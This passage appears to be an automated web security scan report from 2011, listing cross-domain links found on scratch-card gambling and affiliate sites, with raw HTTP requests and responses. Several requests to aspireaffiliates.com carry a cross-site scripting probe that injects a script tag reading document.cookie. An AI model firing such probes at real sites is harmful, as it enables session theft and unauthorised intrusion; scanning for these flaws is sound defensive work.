<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameName">
...[SNIP]...
<a href="/en/Slots/Legend-Of-Terra" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_lnkGame" onclick="openScratchClientWindow(0, 4, 89, '101', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameName">
...[SNIP]...
<a href="/en/Classic/Golden-Fortune" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_lnkGame" onclick="openScratchClientWindow(0, 0, 86, '90', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameName">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl04_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl05_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl06_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl07_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl08_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl09_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div class="service-info overlay"><a href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en">VeriSign Secured</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

18.14. http://scratch.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://scratch.co.uk/?currency=USD

The response contains the following links to other domains:

http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://twitter.com/ukscratch
http://www.facebook.com/?ref=ts
http://www.gambleaware.co.uk/
http://www.gamcare.org.uk/
http://www.hopa.com/visit.aspx?csi=10&CorID=deleted&SentDate=&CorExpTime=&
http://www.lga.org.mt/
http://www.lga.org.mt/lga/home.aspx
http://www.national-lottery.co.uk/
http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div style="visibility:hidden; height:0px;">
<a href="http://www.hopa.com/visit.aspx?csi=10&CorID=deleted&SentDate=&CorExpTime=&" class="iframe" >Iframe Content</a>
...[SNIP]...
<area href="/over-18/" alt="" coords="303,0,333,50" />
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="332,0,401,50" class="popupwindow" />
<area href="http://www.neogames.com/" alt="" coords="450,0,542,50" onclick="window.open(this.href);return false;" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="" coords="400,0,449,50" class="popupwindow" />
<area href="http://www.gamcare.org.uk/" alt="" coords="542,0,571,50" onclick="window.open(this.href);return false;" />
<area href="http://www.gambleaware.co.uk/" alt="" coords="572,0,635,50" onclick="window.open(this.href);return false;" />
<area href="http://www.lga.org.mt" alt="" coords="636,0,755,50" onclick="window.open(this.href);return false;" />
</map>
...[SNIP]...
</a>. Make sure you <a href="http://twitter.com/ukscratch" rel="external">follow us on Twitter</a> & <a href="http://www.facebook.com/#/pages/Scratchcouk/196196857653?ref=ts" rel="external">Join us on Facebook</a>
...[SNIP]...
<p class="foottext">Scratch.co.uk are not affiliated in any way with <a href="http://www.national-lottery.co.uk" rel="external">The National Lottery</a> ® <a href="http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl" rel="external">Scratchcards</a>
...[SNIP]...
ered in Malta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates Scratch.co.uk under a license issued and regulated by the <a rel="external" href="http://www.lga.org.mt/lga/home.aspx">Lotteries and Gaming Authority</a>
...[SNIP]...

18.15. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/Lobby.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI=

The response contains the following links to other domains:

https://images.scanalert.com/meter/survey/secure.neogames-tech.com/55.gif
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=da
https://www.mcafeesecure.com/RatingVerify?ref=secure.neogames-tech.com

Request

GET /ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lql2vynmt5oxqjekwkix5xmj; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.neogames-tech.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/secure.neogames-tech.com/55.gif" title="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" /></a>
...[SNIP]...
<td style="font-size:0px;background-image:url(images/seal_background.png);background-repeat:repeat-x;">
                        <a target="_blank" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=da"><img src="images/seal_verisign.png" width="83" height="37" title="This page is protected by VeriSign." border="0" />
...[SNIP]...

18.16. https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/js/LoadObjects.js

Issue detail

The page was loaded from a URL containing a query string:

https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js?v1.0.2011-2.1.66

The response contains the following link to another domain:

https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /ScratchCards/js/LoadObjects.js?v1.0.2011-2.1.66 HTTP/1.1
Host: secure.neogames-tech.com
Connection: keep-alive
Referer: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=1&CUR=GBP&LNG=~ENG&AFI=&MMI=0&CKI=&AR=&PAR=&RegistrationMode=PM&BO=FM&SDN=Scratch2Cash.com&__utma=-&__utmb=171482274.1.10.1305548356&__utmc=171482274&__utmx=-&__utmz=-&__utmv=-&__utmk=22205543
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; ASP.NET_SessionId=5p03ge55er42ijbnracipjyy

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 08 May 2011 13:56:46 GMT
Accept-Ranges: bytes
ETag: "0a3c6c487dcc1:1396"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:46:49 GMT
Content-Length: 5318

function LoadLobby(pCSI, pBGColor, pSKI, pCUR, pLNG, pAFI, pMMI, pAR, pPAR, pDS, pAPIURL, pShortcutInstalled, pVersion, pWBA, pMUB, pRegistrationMode, pBO, pSkinDomainName, pSlogan, pSkinName, pBrowse
...[SNIP]...
RED=' + pCorrespondenceExp + pHistoryParams + pUniqueVisitorID;
// send GID if not exist
if (strFlashVars.indexOf("GID") == -1) {
strFlashVars +="&GID=" + pGID;
}

s = '<OBJECT id="scratch2a" codebase="https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" \n';
s += ' height="' + iHeight + '" width="' + iWidth + '" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"> \n';
s += ' <PARAM NAME="WMode" VALUE="' + (navigator.appName == 'Microsoft Internet Explorer' ? 'opaque' : 'window') + '">
...[SNIP]...

18.17. https://www.aspireaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js
https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif"" onmouseout="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif"" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.18. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js
https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif"" onmouseout="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif"" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.19. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?a034a\

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/CSS/AffiliatesStyle.css
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:24:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</title><link id="lnkCss" type="text/css" rel="stylesheet" href="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/CSS/AffiliatesStyle.css" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

18.20. https://www.aspireaffiliates.com/marketing-samples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The page was loaded from a URL containing a query string:

https://www.aspireaffiliates.com/marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js
https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif"" onmouseout="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif"" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.21. https://www.aspireaffiliates.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/mobile/

Issue detail

The page was loaded from a URL containing a query string:

https://www.aspireaffiliates.com/mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js
https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif"" onmouseout="this.src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif"" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.22. http://www.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bigmoneyscratch.com/Home.aspx?LanguageCode=ENG

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/MenuCorner.jpg
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/bottom.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_bl.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_br.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tl.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tr.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/logo_ENG.jpg
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/mobile_icon.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/ContactUs_ENG.gif
http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/WinnersHeader_ENG_USD.jpg
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.facebook.com/pages/BigMoneyScratch/156518521055171
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

